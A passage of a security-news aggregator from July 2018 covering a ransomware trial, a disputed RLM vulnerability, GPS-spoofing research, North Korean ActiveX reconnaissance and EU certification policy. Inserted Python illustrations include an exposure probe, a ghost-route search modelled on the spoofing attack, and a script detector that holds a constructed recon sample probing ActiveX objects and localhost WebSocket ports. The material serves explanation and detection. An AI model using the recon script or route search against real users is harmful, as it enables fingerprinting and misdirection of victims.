It then continued with claims by victims who had paid to get their files back. One victim was interested in Bitcoin and decided to pay the ransom. However, he already had some bitcoins on his computer, which were stolen by the suspects (the software supported this functionality), and now he wanted his bitcoin back :). Another victim had his own company, and the infection took place while he was on vacation. He wanted 5000 euro because the suspects had ruined his vacation and with 5000 euro he could go on vacation again.

Now it was the prosecutor’s turn: twelve months of jail time with all but three months suspended. Effectively this comes down to three months; counting the time they already served (at ⅔), about two months of jail. The lawyers then requested many hours of community service instead (since the brothers made a full confession, wanted to help the victims get their files back, etc.). One of the reasons given for not requesting jail time was: “Bitcryptor is not malware”. But BitCryptor was the follow-up to Coinvault, a different name for the same software. Nobody except the lawyer really understood the quote, since it was obviously malware and made victims.

In two weeks, on the 26th of July at 13:00 CET, we will know the outcome.

Vulnerability or Not? Pen Tester Quarrels With Software Maker
19.7.2018 securityweek 

Security Industry Battles Over Testing Methods

Researcher Publishes PoC; Vendor Says it's Not a Vulnerability

A SpiderLabs security researcher has published details of what he considers to be a vulnerability in the RLM web application provided by Reprise Software. Reprise CEO Matt Christiano has told SecurityWeek it is not a vulnerability.

RLM is the Reprise License Manager, described by Reprise as "a flexible and easy-to-use license manager with the power to serve enterprise users." The researcher is Adrian Pruteanu, security consultant with SpiderLabs at Trustwave.

During a penetration engagement, Pruteanu writes, "I was able to identify a critical vulnerability which allowed me to execute code on the server, eventually leading to full domain compromise. Regrettably, despite my best efforts, the vendor has refused to issue patches as they do not believe these findings to be vulnerabilities."

Christiano responded, "The issue described in the [SpiderLabs] article is certainly not a vulnerability, it is misuse of the product."

Pruteanu claims RLM allows users (and attackers) to read and write data to any file on disk, provided RLM has access to it. By default, RLM's web server, running on port 5054, does not require authentication. This allows an attacker to write malware to the user Startup folder without administrator access, even if RLM.exe is running under a low-privilege user. If RLM.exe is privileged, the malware can be written to the All Users Startup folder instead.

Christiano retorts, "RLM does not require elevated permissions to perform any operation, and is designed to be run in a segregated, non-privileged account. To install the program as root/administrator is simply negligent. This is clearly documented."

Christiano goes on to state that port 5054 was assigned to RLM by IANA in 2008. Furthermore, he adds, "License server machines are rarely internet-facing, and when they are, port 5054 is not required for operation, and should not be enabled thru the company's firewall."

The researcher provides a full proof of concept (PoC) for his 'vulnerability'. He also located a cross-site scripting (reflected) vulnerability in the lf parameter of the /goform/edit_lf_get_data URL in RLM's web interface. RLM does not enforce POST for this URL and the payload can also be passed with a GET request.

What worries the researcher even more than the vulnerabilities themselves (vulnerabilities can be fixed through responsible disclosure) is the response of the vendor's support staff to the disclosure. Pruteanu reports, "During our email correspondence the general theme could be wrapped up in the following quotes: 'We tell end users not to run the rlm server (which implements the web server) in privileged mode. There is no reason it needs to run with elevated privileges'."

Pruteanu's response is that users typically ignore best practices and leave pre-existing defaults untouched.

Reprise support continued, "We do not consider this a vulnerability, any more than vi or notepad are vulnerabilities. Of course, NO ONE should run the servers as root/administrator; if they do, they deserve what they get. They can, also, disable the web interface, or, if they want to run it, they can enable logins for it. So there are plenty of opportunities for an admin to prevent any file writing."
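Whatever one calls it, the exposure both sides describe comes down to one observable fact: with logins disabled, the web server on port 5054 answers anyone who can reach it. The check below, added here as an illustration and not code from Reprise, Trustwave or the original article, makes that observable from the network side: it reports whether an HTTP interface on a host answers a credential-less request with a page rather than with an authentication challenge or a redirect to a login page. The two handlers `_NoAuthAdmin` and `_AuthAdmin` are stand-ins for an admin interface before and after logins are enabled, constructed for the demo; nothing here reproduces RLM's actual pages or the file-write behaviour.

```python
import http.client
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

RLM_WEB_PORT = 5054  # port the article says RLM's web server listens on by default


def probe_web_admin(host, port=RLM_WEB_PORT, timeout=3.0):
    """Report whether an HTTP admin interface on host:port serves '/' to a
    request carrying no credentials. 'exposed' is True when the reply is a
    200 with neither a WWW-Authenticate challenge nor a redirect to a login page."""
    result = {"host": host, "port": port, "listening": False,
              "status": None, "exposed": False}
    try:
        with socket.create_connection((host, port), timeout=timeout):
            result["listening"] = True
    except OSError:
        return result                      # closed or filtered: nothing to assess
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", "/", headers={"User-Agent": "admin-exposure-check"})
        resp = conn.getresponse()
        resp.read()
        result["status"] = resp.status
        challenged = (resp.status in (401, 403)
                      or resp.getheader("WWW-Authenticate") is not None)
        location = (resp.getheader("Location") or "").lower()
        login_redirect = resp.status in (301, 302, 303, 307, 308) and "login" in location
        result["exposed"] = resp.status == 200 and not challenged and not login_redirect
    except (OSError, http.client.HTTPException):
        pass                               # listening but not speaking HTTP
    finally:
        conn.close()
    return result


class _NoAuthAdmin(BaseHTTPRequestHandler):
    """Stand-in for a web interface with logins disabled (constructed for the demo)."""
    def do_GET(self):
        body = b"<html><body>license server admin</body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):          # keep the demo output quiet
        pass


class _AuthAdmin(_NoAuthAdmin):
    """Stand-in for the same interface after logins have been enabled."""
    def do_GET(self):
        self.send_response(401)
        self.send_header("WWW-Authenticate", 'Basic realm="admin"')
        self.send_header("Content-Length", "0")
        self.end_headers()


def start_stub(handler_cls):
    """Start a throwaway local server on an ephemeral port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), handler_cls)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    for cls in (_NoAuthAdmin, _AuthAdmin):
        srv, port = start_stub(cls)
        print(cls.__name__, probe_web_admin("127.0.0.1", port))
        srv.shutdown()
        srv.server_close()
```

Against a real license server the call is simply `probe_web_admin("licsrv.example.internal")`; an `exposed: True` result is the condition both sides of the dispute say should not exist, and the fixes are the ones the article lists: firewall port 5054, disable the web interface or enable its logins, and run the service under a non-privileged account.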

Christiano expanded on his support staff comments. He clearly sees the issue as user or installer security misconfiguration (#6 in OWASP's current Top Ten Web Application Risks) rather than a vulnerability. "SpiderLabs refused to identify the 'customer' with this 'problem', denying us the opportunity to review our ISV's installation procedures and correct them," he said.

Of course, SpiderLabs is almost certainly enjoined by customer NDAs not to mention it by name. "One could argue," continued Christiano, "that SpiderLabs cares less about solving the problem than they do about creating sensational headlines to generate more business. I am not arguing that, but one could."

The timeline for the researcher's attempted responsible disclosure is short and limited. Over the course of just 13 days in May 2018, the researcher claims that he disclosed the vulnerabilities; the vendor, he says, refused to accept they are vulnerabilities and refused to patch; the researcher encouraged the vendor to reconsider; and the vendor chose to discontinue communication. There was no route to escalate the issue beyond the support person; and Pruteanu feels he had no alternative but to go to public disclosure.

But Christiano disputes this. "We did correspond with SpiderLabs thru June 2018 (not May)," he told SecurityWeek, "and described the situation to them; we received no further reply from them until they provided you with this misleading information."

"The biggest problem we run into during the disclosure process," comments Pruteanu "is getting the disclosure in front of the correct audience. Even though these vendors are basically getting a free audit that helps them secure their products for their customers, we are often met with hostility simply because they are unsure how to handle the report. If you don't have the capability to support this process in house there are third party options like Bugcrowd."

Christiano replies, "It is not at all clear how [SpiderLabs] did their testing, or how the software was installed. Clearly, it was installed incorrectly. Finally, Reprise has never refused to address any security vulnerability in any of our products."

It comes down to whether 'allowing' misconfiguration is in itself a vulnerability. Pruteanu believes it is. Christiano believes it is not, and that software installers have a responsibility to configure applications in the way intended and advised.

Chicago-based data security and compliance solutions firm Trustwave was acquired by Singapore Telecommunications (Singtel) for $810 million in cash in April 2015.

Russia Targeted by Almost 25 Million Cyber-Attacks During World Cup: Putin
19.7.2018 securityweek BigBrothers

Russia was the target of almost 25 million cyber-attacks during the World Cup, President Vladimir Putin said, though he did not indicate who may have been behind the attacks.

"During the period of the World Cup, almost 25 million cyber-attacks and other criminal acts on the information structures in Russia, linked in one way or another to the World Cup, were neutralised," Putin said during a meeting on Sunday with security services.

The president, whose comments were reported by the Kremlin on Monday, gave no information on the nature or possible origins of the cyber-attacks.

"Behind this (World Cup) success lies huge preparatory, operational, analytical and information work, we operated at maximum capacity and concentration," said Putin.

Russia, which hosted the World Cup from June 14 to July 15 in 11 cities and 12 stadiums, has been repeatedly accused by Western countries of conducting cyber-attacks.

On Friday, 12 Russian military intelligence officers were charged with hacking Hillary Clinton's 2016 presidential campaign and the Democratic Party in a stunning indictment three days before President Donald Trump meets with Putin in Helsinki on Monday.

The charges were drawn up by Special Counsel Robert Mueller, the former FBI director who is looking into Russian interference in the November 2016 vote and whether any members of Trump's campaign team colluded with Moscow.

Proposed EU Cybersecurity Product Certification Scheme Has Global Effects
19.7.2018 securityweek Cyber

The European Union is active in passing cybersecurity legislation ostensibly for the European Union but with worldwide ramifications. The General Data Protection Regulation (GDPR) and the Payment Services Directive 2 (PSD2) are recent examples. The effect on a global scale is similar to that of California on a U.S. national scale: the respective markets are so important that vendors tend to comply across the board.

There is more coming from the EU: the proposed Cybersecurity Act (9350/18) (PDF). On July 10, the proposal passed one of the major hurdles for new legislation when it was approved by the European Parliament's Industry Committee by 55 votes to five with one abstention. The key features of the proposal are to give more authority, budget and responsibility to the European Union Agency for Network and Information Security (ENISA); and to develop "European cybersecurity certification schemes for the purpose of ensuring an adequate level of cybersecurity of ICT processes, products and services in the Union."

The likelihood of the proposal proceeding to binding legislation can be gauged by the Industry Committee's reaction: it seeks to strengthen the proposal by making the certification mandatory for the critical infrastructure industries (the original proposal does not require certification, suggesting it should be voluntary). At this stage we do not know the details of the final outcome, but we can be fairly certain that there will be a new unified European certification scheme designed, developed and operated by ENISA.

The scope of the certification scheme is wide. Title III, paragraph 2 of the Act states, "The European cybersecurity certification framework defines a mechanism to establish European cybersecurity certification schemes and to attest that the ICT processes, products and services that have been evaluated in accordance with such schemes comply with specified security requirements with the aim to protect the availability, authenticity, integrity or confidentiality of stored or transmitted or processed data or the functions or services offered by, or accessible via, those products, processes, and services throughout their life cycle." It covers both traditional computer devices and the connected devices that comprise the Internet of Things (IoT).

The intention seems to be for ENISA to develop three levels of product assurance: basic, substantial and high.

The Cybersecurity Act generates mixed feelings, especially among non-EU companies operating in or trading with Europe. There have been, and still are, many different security product certification schemes worldwide, and some feel that this will be just another burden placed on device manufacturers. Ilia Kolochenko, CEO of High-Tech Bridge, is unsure of the need for a new scheme.

"Based on the information currently available about the ENISA certification," he told SecurityWeek, "I cannot see any substantially new or significantly better approach to cybersecurity or privacy compared to numerous already existing certifications, regulations or international standards such as ISO 27001."

The danger in new, locally-based, requirements is that they can further balkanize any attempts at global harmonization -- and given current global political and economic tensions, the result could do more harm than good. "In light of the escalating tariff war between the US and Europe," Kolochenko continued, "further segmentation of cybersecurity certifications and accreditations will inevitably bring more confusion and add unnecessary complexity -- let alone Russia or China with their own rules of the game. Different communities of experts will compete to make their standard slightly better, instead of joining their efforts to bring a unified global set of simple but efficient rules."

In August 2017, the IOT Cybersecurity Coalition wrote to the European Commission offering advice and voicing concerns. For example, it urges the EU to 'leverage existing best practices and global industry-led standards'.

"This avoids burdening multinational enterprises with the requirements of conflicting jurisdictions while facilitating interoperability, compatibility, reliability, and security on a global scale." This is part of the 'regulations inhibit innovation' argument. The Coalition fears that existing voluntary efforts "would be stymied by the slow and unitary nature of the EU standards development process should the EU move forward with mandatory standards, testing, and labelling requirements. Meanwhile, threat actors will continue to innovate unhindered."

Kolochenko touches on this concern. "One should be careful not to overestimate the value of a certification. Certification is merely a beautiful facade, behind which there is a reality. We have seen quite a few breaches of PCI DSS certified merchants and similarly notorious cases." He is concerned that industry will spend more time on ensuring that products they use are correctly certified than on ensuring their digital premises are really secure. "Paper security may undermine practical security," he said.

The Coalition considers the potential for a false sense of security based on trust labels that could potentially have been issued several years earlier to be a concern. "Specifically," it says, "we remain concerned that pushing for generic or blanket cybersecurity labelling of IoT products could result in counterproductive technology mandates, new market access barriers, or roadblocks to innovation without necessarily bringing any real security or privacy benefits that could not otherwise be achieved on the basis of already existing instruments."

In February this year, AmCham EU (the American Chamber of Commerce to the European Union, claiming to be the voice of American business in Europe) published its own critique of the Cybersecurity Act. It welcomes the plan to convert ENISA into a permanent EU cybersecurity agency with greater power and resources, but urges the agency to strengthen its collaboration with industry "in an inclusive and transparent way."

AmCham has major reservations over the effect of certification on industry. "The framework should be voluntary and market-driven in nature as companies should be able to develop the security system features best for their unique risk situation... The proposal should also take into account the possibility of self-declaration."

Kolochenko doesn't think this is likely -- or if initially possible, it will necessarily remain so. "Of course, it’s a question of how the certification will be used and where it will be mandatory, but one may reasonably assume that European governmental entities and some companies will require it -- and prefer it to NIST or any foreign standards that have existed for more than a decade."

Transparency -- or its lack -- is as much a concern for AmCham as it is for the IOT Cybersecurity Coalition. "The proposed process lacks provisions for adequate transparency and openness, and is ultimately not reflecting the provisions and best practices under the WTO Agreement on Technical Barriers to Trade."

Some concerns seem to have been met. "The limitation of the applicability of certifications to a maximum of three years under Article 48.6 is particularly problematic," says AmCham. The current draft proposal has struck out "a maximum period of three years" and replaced it with "the period defined by the particular certification scheme". Nevertheless, this concern links back to the 'false sense of security' concern: a product may have been in compliance when it was tested, but how can you guarantee it is still in compliance, or not vulnerable to a newly discovered zero-day vulnerability today?

Indeed, this raises a further legal or at least moral complication. If a product fails to meet its description, there is potential for legal action against the manufacturer. But if a product has been 'guaranteed' by ENISA certification and still fails, who is liable: the manufacturer, ENISA or the European Commission?

It would be wrong, however, to suggest that the proposed certifications are completely without support. "I welcome any initiative to increase the security and assurance of ICT products," comments Ed Williams, director EMEA of SpiderLabs at Trustwave; "given the current climate this legislation is welcome... ICT products can be difficult and complex: ensuring that security is baked in could, initially, be difficult but is clearly the correct thing to do -- secure by design is a must in 2018 and moving forward. I, for one," he added, "hope that this certification framework is successful in raising what is currently a low bar. Good luck!"

Russia's National Vulnerability Database Slow, Incomplete
19.7.2018 securityweek BigBrothers

Russia’s national vulnerability database is slow, incomplete and it focuses on security flaws that could pose a threat to the country’s IT systems, according to an analysis conducted by threat intelligence firm Recorded Future.

After analyzing the national vulnerability databases of the United States and China, Recorded Future has decided to take a look at Russia’s database, known as the BDU. The BDU is maintained by the Federal Service for Technical and Export Control of Russia (FSTEC), an agency whose role is to protect state secrets and provide support for counterespionage and counterintelligence missions.

Researchers discovered significant differences both in the number of vulnerabilities and the time it takes to add them to the database, compared to the databases run by China and the United States. For instance, while the US’s NVD stored information on nearly 108,000 security holes, the BDU only documented just over 11,000 flaws in March, when Recorded Future conducted its analysis.

As for the time it takes for a vulnerability to be included in the BDU, the average is 95 days, much more than in the United States (45 days) and China (11 days).

While Russia’s database only covers roughly 10 percent of known vulnerabilities, there are certain pieces of software and certain types of bugs that seem more important to the maintainers of the database.

Software vulnerabilities covered above average in Russia's national vulnerability database

Researchers noticed that the BDU stores information on 61 percent of the vulnerabilities known to have been exploited by Russia-linked advanced persistent threat (APT) groups in their campaigns. This is in contrast to China, whose CNNVD database hides or delays flaws exploited by the country’s intelligence services.

While the vulnerabilities exploited by Russia-linked APTs affect some of the world’s most widely used software, their presence in the vulnerability database suggests that the systems of the Russian government also run these programs, especially since FSTEC’s mission is to protect government systems. This also provides insight into the applications used by the Russian government.

Moreover, Recorded Future points out it’s also possible that hackers sponsored by the Russian military leverage vulnerabilities in the BDU in their operations, or that the military may be obligated to protect the state’s IT systems by providing information on these flaws.

“The public record and available data is not yet sufficient to determine the relationship between FSTEC and Russian state-sponsored cyber operations,” Recorded Future said in its report.

On the other hand, while the BDU covers many vulnerabilities affecting Adobe products, even in this category the database is incomplete. According to researchers, there are over 1,200 Adobe bugs with a CVSS score higher than 8 that are not present in Russia’s database.

So why waste resources on an incomplete and very slow vulnerability database?

A lack of resources could be an explanation, but analysts note that FSTEC has over 1,100 employees, nearly triple compared to the US’s NIST Information Technology Laboratory (ITL), which maintains the country’s NVD.

Another possible scenario is that FSTEC has both an offensive and a defensive mission and its database covers vulnerabilities based on competing needs. However, experts believe this theory is not accurate either, considering that the agency is not a public service organization: its main mission is to protect state and critical infrastructure systems and to support counterintelligence initiatives.

The most likely scenario, Recorded Future believes, is that the BDU is “simply a baseline for government information systems security and software inspections.”

One of the roles of FSTEC is to review the software of foreign companies that want to sell their products in Russia. This includes firewalls, antiviruses and applications that use encryption.

“FSTEC is a military organization and is publishing ‘just enough’ content to be credible as a national vulnerability database. The Russian government needs vulnerability research as a baseline for FSTEC’s other technical control responsibilities, such as requiring reviews of foreign software,” the threat intelligence firm said.

Researchers Stealthily Manipulate Road Navigation Systems
19.7.2018 securityweek CyberCrime

A team of researchers from Virginia Tech, the University of Electronic Science and Technology of China, and Microsoft Research has discovered a new and stealthy GPS spoofing method that has been proven to be highly effective against road navigation systems.

GPS spoofing has been around for many years. This attack method can in theory be used to trick drivers into going to an arbitrary location, but in practice the instructions provided by the targeted navigation system often contradict the physical road (e.g. make a left turn on a highway), making it less likely to work in a real-world scenario.

Researchers now claim to have discovered a more efficient method that is less likely to raise suspicion. Using this technique an attacker could trick the victim into following an incorrect route (e.g. cause ambulances and police cars to enter a loop route), divert a targeted vehicle to a specific location, or cause the target to enter a dangerous situation (e.g. enter a highway the wrong way).

For the attack to work, the attacker needs to know the target’s approximate destination, and the most likely victim of this technique would be an individual who is not familiar with the area.

Using 600 real-world taxi routes from Manhattan and Boston, the researchers have created an algorithm that generates a virtual route mimicking the shape of real roads. The attack is most likely to work in a city where road networks are dense.

The attacker creates false GPS signals in an effort to set the final location to a nearby “ghost location.” The navigation system recalculates the new route, which researchers have dubbed the “ghost route,” and guides the victim, turn-by-turn, to the ghost location.

In order to avoid raising suspicion, the ghost route is generated based on the collected taxi trips. The search algorithm is run at each road segment in an effort to identify all possible attack (ghost) locations. During tests, the algorithm identified, on average, roughly 1,500 potential attack routes for each trip.

New GPS spoofing attack

“The algorithm crafts the GPS inputs to the target device such that the triggered navigation instruction and displayed routes on the map remain consistent with the physical road network,” researchers said in their paper.
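The core of the attack is therefore a search for road paths whose turn-by-turn instructions cannot be told apart. The code below is an added, simplified illustration of that idea, not the researchers' algorithm or their taxi data: it builds a constructed grid road network (standing in for the dense city networks the study used), derives instructions (segment length plus left/right/straight) from a route, and enumerates every other simple path with an indistinguishable instruction sequence that ends somewhere other than the true destination. If the driver sees one of these routes on screen but is physically on another, every instruction still matches the road ahead. The names `grid_graph`, `instructions`, `consistent` and `find_ghost_routes` are this example's own.

```python
import math
from itertools import product


def grid_graph(n):
    """Constructed toy road network: an n x n grid of intersections one unit
    apart, as {node: set(neighbours)}."""
    g = {(x, y): set() for x, y in product(range(n), repeat=2)}
    for (x, y) in g:
        for dx, dy in ((1, 0), (-1, 0), (0, 1), (0, -1)):
            nb = (x + dx, y + dy)
            if nb in g:
                g[(x, y)].add(nb)
    return g


def manoeuvre(a, b, c):
    """Instruction given at b when driving a -> b -> c: 'L', 'R' or 'S'
    (straight), from the sign of the 2-D cross product of the two segments."""
    v1 = (b[0] - a[0], b[1] - a[1])
    v2 = (c[0] - b[0], c[1] - b[1])
    cross = v1[0] * v2[1] - v1[1] * v2[0]
    if abs(cross) < 1e-9:
        return "S"
    return "L" if cross > 0 else "R"


def instructions(route):
    """Turn-by-turn list of (segment_length, manoeuvre_at_segment_end);
    the final segment ends with 'ARRIVE'."""
    out = []
    for i in range(len(route) - 1):
        a, b = route[i], route[i + 1]
        nxt = manoeuvre(a, b, route[i + 2]) if i + 2 < len(route) else "ARRIVE"
        out.append((math.dist(a, b), nxt))
    return out


def consistent(instr_a, instr_b, tol=0.25):
    """Same manoeuvres in the same order, segment lengths within a relative tolerance
    (a driver does not notice '300 m' against '340 m')."""
    if len(instr_a) != len(instr_b):
        return False
    return all(ma == mb and abs(la - lb) <= tol * max(la, lb)
               for (la, ma), (lb, mb) in zip(instr_a, instr_b))


def find_ghost_routes(graph, shown_route, tol=0.25):
    """Every simple path in the graph whose instructions are indistinguishable
    from those of shown_route and which ends away from its true destination.
    Exhaustive DFS with prefix pruning; fine for a toy graph, not for a city."""
    target = instructions(shown_route)
    n_edges = len(shown_route) - 1
    true_dest = shown_route[-1]
    ghosts = []

    def dfs(path):
        if len(path) - 1 == n_edges:
            if path[-1] != true_dest and consistent(instructions(path), target, tol):
                ghosts.append(tuple(path))
            return
        # Prune: every manoeuvre already fixed by the prefix must match.
        prefix = instructions(path)
        if len(prefix) > 1 and not consistent(prefix[:-1], target[:len(prefix) - 1], tol):
            return
        for nb in graph[path[-1]]:
            if nb not in path:
                dfs(path + [nb])

    for start in graph:
        dfs([start])
    return ghosts


if __name__ == "__main__":
    city = grid_graph(4)
    shown = [(0, 0), (1, 0), (2, 0), (2, 1), (2, 2)]
    print("instructions:", instructions(shown))
    for r in find_ghost_routes(city, shown):
        print("indistinguishable path ending at", r[-1], ":", r)
```

On the 4x4 grid the short example route has fifteen indistinguishable alternatives, which is the mechanism behind the article's observation that dense road networks make the attack easier: the more regular the grid, the more physical paths share one instruction sequence.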

In some cases, if the original location is not on the route to the ghost location, the user may be informed by the navigation system that the route is being recalculated, but researchers have determined based on a survey that it might not raise too much suspicion considering that this can often occur in a real-world scenario.

These types of attacks can be carried out using a portable GPS spoofer, which costs roughly $200, from a distance of 40-50 meters (130-160 feet). The attacker can either follow the targeted vehicle or place the spoofer inside or under the targeted car and control it remotely.

The researchers reproduced the attack in a real-world scenario using their own car, which they drove after midnight in suburban areas to avoid causing any problems. They also asked 40 individuals (20 in the U.S. and 20 in China) to use a driving test simulator that was attacked via the newly discovered method. The attack’s success rate was 95%, with only one Chinese and one U.S. participant detecting the attack.

Compliance-Focused Cybersecurity Firm A-LIGN Raises $54.5 Million
19.7.2018 securityweek IT

A-LIGN, a provider of cybersecurity and compliance solutions, announced this week that it has raised $54.5 million from growth equity firm FTV Capital.

Tampa, Florida-based A-LIGN provides assessments, audits and cyber risk advisory and testing services for companies of all sizes. Using its flagship platform, A-SCEND, the company helps organizations address third-party risks, security controls, and privacy concerns, with a focus in four core areas:

• Compliance Assessments: SSAE 18, SOC I, II, III audits, and assessments;

• Industry Specific Audits such as ISO, PCI, HITRUST, HIPAA;

• Cybersecurity Services: Penetration testing, vulnerability scanning; and

• Cyber Risk and Privacy: GDPR, CCPA, related privacy and incident planning services.

“Evolving security frameworks and the continual release of new regulations and compliance requirements, such as GDPR, SOC I/II/III, and the recently-passed California Consumer Privacy Act, require that company executives constantly examine their data privacy practices,” Scott Price, CEO of A-LIGN, said in a statement. “Organizations across all industries are conducting critical assessment and audits not only for mandated compliance but also to deepen trust among customers and users which has a direct impact on the bottom line.”

A-LIGN is a licensed CPA firm, Qualified Security Assessor Company (QSAC), accredited ISO 27001 certification body, certified HITRUST Assessor firm, and accredited FedRAMP 3PAO. The company’s tools help customers streamline the audit and certification process through workflow automation, document management, and auditing history.

As part of the transaction, FTV Capital partner Liron Gitig and managing partner Richard Garman will join the company’s board of directors.

North Korean Hackers Launch New ActiveX Attacks
19.7.2018 securityweek BigBrothers

Watering Hole Attacks Target South Korean Users With ActiveX Exploits

A new series of reconnaissance attacks targeting ActiveX objects has been associated with the North Korean-linked Andariel group, a known branch of the notorious Lazarus Group.

In May, the group was observed exploiting an ActiveX zero-day vulnerability in a series of attacks on South Korean targets, mainly for reconnaissance purposes. A script injected into compromised websites would identify the visitor’s operating system and browser and, if Internet Explorer was detected, check for ActiveX support and for running plugins from a specific list of ActiveX components.

Highly active in recent months, the Andariel group has apparently launched a new reconnaissance attack against South Korean targets, by injecting their code into four other compromised websites. The attack, which was spotted on June 21, attempts to collect different object information than before.

Despite targeting objects it wasn’t targeting before, the newly discovered script is similar to the one used in May, which led Trend Micro to the conclusion that the same group of hackers is behind both campaigns.

Previously, the group collected targeted ActiveX objects on users’ Internet Explorer browser and only launched the zero-day exploit after identifying the right targets.

“Based on this, we believe it’s likely that the new targeted ActiveX objects we found could be their next targets for a watering hole exploit attack,” Trend Micro explains.

The new attack lasted until June 27 and targeted the visitors of a Korean non-profit organization’s website and those of three South Korean local government labor union websites.

The injected script, which had similar obfuscation and structure as the Andariel-linked script found in May, was designed to collect visitor information such as browser type, system language, Flash Player version, Silverlight version, and multiple ActiveX objects.

According to Trend Micro, the script was attempting to detect two additional ActiveX objects that were not previously targeted, namely one related to a DRM (Digital Rights Management) software from a South Korean Document Protection Security vendor and another related to a South Korea-based voice conversion software company.

The script also included code to open a websocket connection to localhost. “The voice conversion software has websocket service listening on the local host so the injected script can detect the software by checking if they can establish a connection to ports 45461 and 45462, which the software uses,” Trend Micro explains.

The websocket verification, the security researchers say, could also be performed on Chrome and Firefox, in addition to Internet Explorer, which would suggest that the hackers have expanded their target base, aiming at the software and not just the ActiveX objects.

“Based on this change, we can expect them to start using attack vectors other than ActiveX,” Trend Micro notes.
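The fingerprinting behaviour described above (ActiveX component probes plus WebSocket connections to loopback ports) can be triaged statically when a suspected injection is pulled from a compromised page. The following is an added example written for this page, not Trend Micro's code or the Andariel script; the ports 45461 and 45462 come from the article, while the JavaScript samples, the `Constructed.*` ProgIDs and the scoring threshold are constructed for the demonstration.

```python
"""Static triage of JavaScript for two recon indicators: ActiveXObject probes and
WebSocket connections to loopback ports. Added example; the samples are constructed."""
import re
from dataclasses import dataclass, field
from typing import List

# wss?://<loopback host>[:port]  -- a WebSocket aimed at software on the visitor's own machine.
LOCAL_WS_RE = re.compile(
    r"""(wss?)://(?:localhost|127\.0\.0\.1|\[::1\])(?::(\d{1,5}))?""", re.IGNORECASE)
# new ActiveXObject("Vendor.Component") with a literal ProgID.
ACTIVEX_LITERAL_RE = re.compile(
    r"""new\s+ActiveXObject\s*\(\s*["']([^"']+)["']\s*\)""", re.IGNORECASE)
# new ActiveXObject(expr) where the ProgID comes from a variable or array element.
ACTIVEX_DYNAMIC_RE = re.compile(
    r"""new\s+ActiveXObject\s*\(\s*[^"'\s)][^)]*\)""", re.IGNORECASE)
# "abc" + "def": adjacent literals joined with '+', the lightest form of string splitting.
CONCAT_RE = re.compile(r"""(["'])([^"'\\]*)\1\s*\+\s*(["'])([^"'\\]*)\3""")


def fold_string_concats(js: str) -> str:
    """Collapse "a" + "b" into "ab" until nothing changes, so split URLs and ProgIDs
    become visible to the regexes. This is normalisation only, not a deobfuscator."""
    prev = None
    while prev != js:
        prev = js
        js = CONCAT_RE.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', js)
    return js


@dataclass
class ReconIndicators:
    activex_progids: List[str] = field(default_factory=list)   # literal ProgIDs probed
    dynamic_activex_probes: int = 0                             # probes with a non-literal ProgID
    local_ws_ports: List[int] = field(default_factory=list)     # loopback ports contacted

    @property
    def suspicious(self) -> bool:
        # A WebSocket to loopback is abnormal for a public page on any browser. A single
        # literal ActiveXObject (legacy XMLHTTP fallback) is not, so ActiveX alone needs
        # several probes before it counts. Threshold of 3 is a constructed choice.
        return bool(self.local_ws_ports) or (
            len(self.activex_progids) + self.dynamic_activex_probes >= 3)


def scan_script(js: str) -> ReconIndicators:
    """Return the recon indicators found in one JavaScript snippet."""
    js = fold_string_concats(js)
    ind = ReconIndicators()
    ind.activex_progids = sorted(set(ACTIVEX_LITERAL_RE.findall(js)))
    ind.dynamic_activex_probes = len(ACTIVEX_DYNAMIC_RE.findall(js))
    ports = set()
    for m in LOCAL_WS_RE.finditer(js):
        scheme, port = m.group(1).lower(), m.group(2)
        ports.add(int(port) if port else (443 if scheme == "wss" else 80))
    ind.local_ws_ports = sorted(ports)
    return ind


# Constructed sample modelled on the behaviour the article describes (not the real script).
# ShockwaveFlash.ShockwaveFlash and AgControl.AgControl are the Flash and Silverlight ProgIDs.
SAMPLE_INJECTED_JS = r'''
var ids = ["Constructed.DRM.Ctl", "Constructed.Voice.Ctl", "ShockwaveFlash.ShockwaveFlash"];
var found = [];
for (var i = 0; i < ids.length; i++) {
  try { new ActiveXObject(ids[i]); found.push(ids[i]); } catch (e) {}
}
try { new ActiveXObject("AgControl.AgControl"); found.push("silverlight"); } catch (e) {}
var s1 = new WebSocket("ws://loc" + "alhost:45461");   // split literal
var s2 = new WebSocket("ws://127.0.0.1:45462/");
'''

# Constructed benign sample: legacy IE XMLHTTP fallback and a WebSocket to a remote host.
SAMPLE_BENIGN_JS = r'''
var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Msxml2.XMLHTTP");
var ws = new WebSocket("wss://example.com/updates");
'''

if __name__ == "__main__":
    for name, js in (("injected", SAMPLE_INJECTED_JS), ("benign", SAMPLE_BENIGN_JS)):
        r = scan_script(js)
        print(f"{name}: suspicious={r.suspicious} progids={r.activex_progids} "
              f"dynamic={r.dynamic_activex_probes} loopback_ports={r.local_ws_ports}")
```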

At Summit, Trump Refuses to Confront Putin on Vote Row
19.7.2018 securityweek BigBrothers

President Donald Trump refused to confront Vladimir Putin over meddling in the US election at their first face to face summit, publicly challenging the findings of the US intelligence community and triggering bipartisan outrage at home.

The US and Russian presidents came out of their meeting in Helsinki Monday expressing desire for a fresh start between the world's leading nuclear powers and more talk on global challenges, after discussing an array of issues from Syria, Ukraine and China to trade tariffs and the size of their nuclear arsenals.

There were indications of an arrangement to work together and with Israel to support a ceasefire in southern Syria, suggesting that the US administration is backing off its demand that Moscow's ally Bashar al-Assad step down.

If that is anathema to many in Washington, Trump's apparent concessions to Putin over the election controversy drew stinging condemnation from across the political divide.

Standing alongside the Kremlin boss at a joint news conference, Trump acknowledged that his intelligence chiefs believe Russia hacked and leaked Democrats' emails containing politically damaging information about his rival Hillary Clinton in 2016.

But, insisting he had won the race fair and square, the wealthy property tycoon said: "I have President Putin, he just said it is not Russia. I will say this: I don't see any reason why it would be."

Friday's US indictment of 12 Russian military intelligence agents exploded with embarrassing timing for Trump as he prepared to meet Putin. On Monday, officials said another Russian agent had been arrested for seeking to influence US politics.

But the US leader insisted that his counterpart had delivered a "powerful" denial of any Russian manipulation, and that the investigation by special counsel Robert Mueller was proving a "disaster" for the United States.

